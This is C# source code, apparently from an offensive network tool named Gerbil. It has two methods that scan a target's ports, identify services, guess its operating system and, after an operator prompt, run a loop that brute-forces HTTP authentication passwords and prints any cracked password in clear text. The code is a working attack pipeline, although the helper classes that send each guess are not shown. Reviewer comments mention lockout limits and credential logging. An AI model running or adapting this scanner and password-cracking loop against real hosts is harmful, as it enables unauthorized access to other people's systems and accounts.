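/// <summary>
/// Runs the interactive sequence against a single host: port probe, service
/// lookup, OS guess and, if the operator confirms the prompt, an HTTP auth
/// password-guessing run.
/// </summary>
/// <remarks>
/// The flow mirrors <c>attackDeviceAuto</c>, which probes a known-port list
/// instead of a fixed range. The password loop calls <c>stab()</c> repeatedly
/// (presumably one authentication attempt per call; confirm in
/// HTTPAuthAttacker), so failed-login lockout or rate limiting on the target
/// service is the control that bounds it.
/// </remarks>
/// <param name="ipAddress">IP address or relative hostname to target.</param>
/// <param name="timeout">
/// Passed unchanged to <c>PortScanner.scan</c>; the unit is not visible here
/// (presumably milliseconds; confirm against the scanner).
/// </param>
public static void begin(string ipAddress, int timeout)
{
    // Probe the host; 0 and 1000 are handed to the scanner as the port range bounds.
    Out.writeln("Probing ports...");
    int[] openPorts = Gerbil_Scanners.PortScanner.scan(ipAddress, 0, 1000, timeout);
    if (openPorts.Length == 0)
    {
        Out.writeln("No open ports found for the specified host and port range.");
        return;
    }
    foreach (int port in openPorts)
    {
        Out.writeln("Found port: " + port);
    }

    // Map the open ports to service names from the local port/service store.
    Out.writeln("Looking up port definitions...");
    string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts);
    if (openServices.Length == 0)
    {
        Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'");
        return;
    }
    Out.writeln("Found service: ");
    foreach (string service in openServices)
    {
        Out.writeln(service);
    }

    if (openServices.Contains("NETBIOS"))
    {
        // The name shown is whatever the system resolver returns for the host;
        // it is not a direct NetBIOS name query despite the label.
        try
        {
            string devName = Dns.GetHostEntry(ipAddress).HostName;
            Out.writeln("NETBIOS Name: " + devName);
        }
        catch (System.Net.Sockets.SocketException ex)
        {
            // A failed lookup previously escaped as an unhandled exception.
            Out.writeln("Host name lookup failed: " + ex.Message);
        }
    }

    // Forward found services to the engine and get its OS guess.
    //TODO: forward training parameter
    Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true);
    // NOTE(review): a local that scaled the certainty by 10 was never read and has
    // been dropped; the printed value is, as before, the raw getCertainty()
    // result. Whether that is already a percentage is not visible here; confirm.
    Out.writeln("OS Guess: " + osr.getName());
    Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty()));

    // HTTP: only runs when the service was found and the operator confirms the prompt.
    if (openServices.Contains("HTTP") && In.securePrompt("Pathfinder", "HTTP Auth Password Crack"))
    {
        int pLength = In.prompt<int>("Maximum length of password");
        Out.writeln("Cracking password...");
        Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(ipAddress, pLength);
        while (true)
        {
            Out.write("*");
            Gerbil.Attackers.AttackerResult AR;
            try
            {
                AR = HAA.stab();
            }
            catch (Exception e)
            {
                // Report the failure instead of ending the loop silently.
                Out.writeln("\nPassword attempt aborted due to an error: " + e.Message);
                break;
            }

            if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection)
            {
                Out.writeln("\nFailed to crack password using given parameters.");
                break;
            }
            if (AR == Attackers.AttackerResult.Connected)
            {
                // NOTE(review): the recovered credential is printed in clear text;
                // anything that captures Out (console transcript, redirected log)
                // will retain it.
                Out.blank();
                Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString()));
                break;
            }
            // Trying (or any other result): keep looping.
        }
    }
}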
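/// <summary>
/// Runs the probe / service lookup / OS guess / optional HTTP auth
/// password-guessing sequence against a device stored in the database.
/// </summary>
/// <remarks>
/// Unlike a range sweep, only the ports returned by <c>PortLookup.getPorts()</c>
/// are probed, one <c>PortScanner.scan</c> call per port. The password loop
/// calls <c>stab()</c> repeatedly (presumably one authentication attempt per
/// call; confirm in HTTPAuthAttacker), so failed-login lockout or rate limiting
/// on the target service is the control that bounds it.
/// </remarks>
/// <param name="DBref">Device database; only <c>Read</c> is called on it here.</param>
/// <param name="devID">Identifier of the device record whose IP address is used.</param>
/// <param name="pingTimeout">
/// Passed unchanged to <c>PortScanner.scan</c>; the unit is not visible here
/// (presumably milliseconds; confirm against the scanner).
/// </param>
private static void attackDeviceAuto(ref Database<Data.Models.Devices.Device> DBref, string devID, int pingTimeout)
{
    Out.blank();

    // Resolve the target address from the stored device record.
    string address = DBref.Read(devID).getDeviceIPAddress().ToString();

    // Probe each port that has a definition in the port/service store.
    Out.writeln("Probing known ports on " + address + "...");
    int[] knownPorts = Gerbil_PortServices.PortLookup.getPorts();
    List<int> foundPorts = new List<int>();
    foreach (int port in knownPorts)
    {
        if (Gerbil_Scanners.PortScanner.scan(address, port, pingTimeout))
        {
            foundPorts.Add(port);
            Out.writeln(port + ": OPEN");
        }
        else
        {
            Out.writeln(port + ": CLOSED");
        }
    }

    int[] openPorts = foundPorts.ToArray();
    if (openPorts.Length == 0)
    {
        Out.writeln("No open ports found for the specified host and port range.");
        return;
    }

    // Map the open ports to service names.
    Out.writeln("Looking up port definitions...");
    string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts);
    if (openServices.Length == 0)
    {
        Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'");
        return;
    }
    Out.writeln("Found service: ");
    foreach (string service in openServices)
    {
        Out.writeln(service);
    }

    if (openServices.Contains("NETBIOS"))
    {
        // The name shown is whatever the system resolver returns for the host;
        // it is not a direct NetBIOS name query despite the label.
        try
        {
            string devName = Dns.GetHostEntry(address).HostName;
            Out.writeln("NETBIOS Name: " + devName);
        }
        catch (System.Net.Sockets.SocketException ex)
        {
            // A failed lookup previously escaped as an unhandled exception.
            Out.writeln("Host name lookup failed: " + ex.Message);
        }
    }

    // Forward found services to the engine and get its OS guess.
    //TODO: forward training mode parameter
    Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true);
    // NOTE(review): a local that scaled the certainty by 1000 was never read and
    // has been dropped; the printed value is, as before, the raw getCertainty()
    // result. Whether that is already a percentage is not visible here; confirm.
    Out.writeln("OS Guess: " + osr.getName());
    Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty()));

    // HTTP: only runs when the service was found and the operator confirms the prompt.
    if (openServices.Contains("HTTP") && In.securePrompt("AttackMethods", "HTTP Auth Password Crack"))
    {
        int pLength = In.prompt<int>("Maximum length of password");
        Out.writeln("Cracking password...");
        Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(address, pLength);
        while (true)
        {
            Out.write("*");
            Gerbil.Attackers.AttackerResult AR;
            try
            {
                AR = HAA.stab();
            }
            catch (Exception ex)
            {
                // Report the failure instead of ending the loop silently.
                Out.writeln("\nPassword attempt aborted due to an error: " + ex.Message);
                break;
            }

            if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection)
            {
                Out.writeln("\nFailed to crack password using given parameters.");
                break;
            }
            if (AR == Attackers.AttackerResult.Connected)
            {
                // NOTE(review): the recovered credential is printed in clear text;
                // anything that captures Out (console transcript, redirected log)
                // will retain it.
                Out.blank();
                Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString()));
                break;
            }
            // Trying (or any other result): keep looping.
        }
    }
}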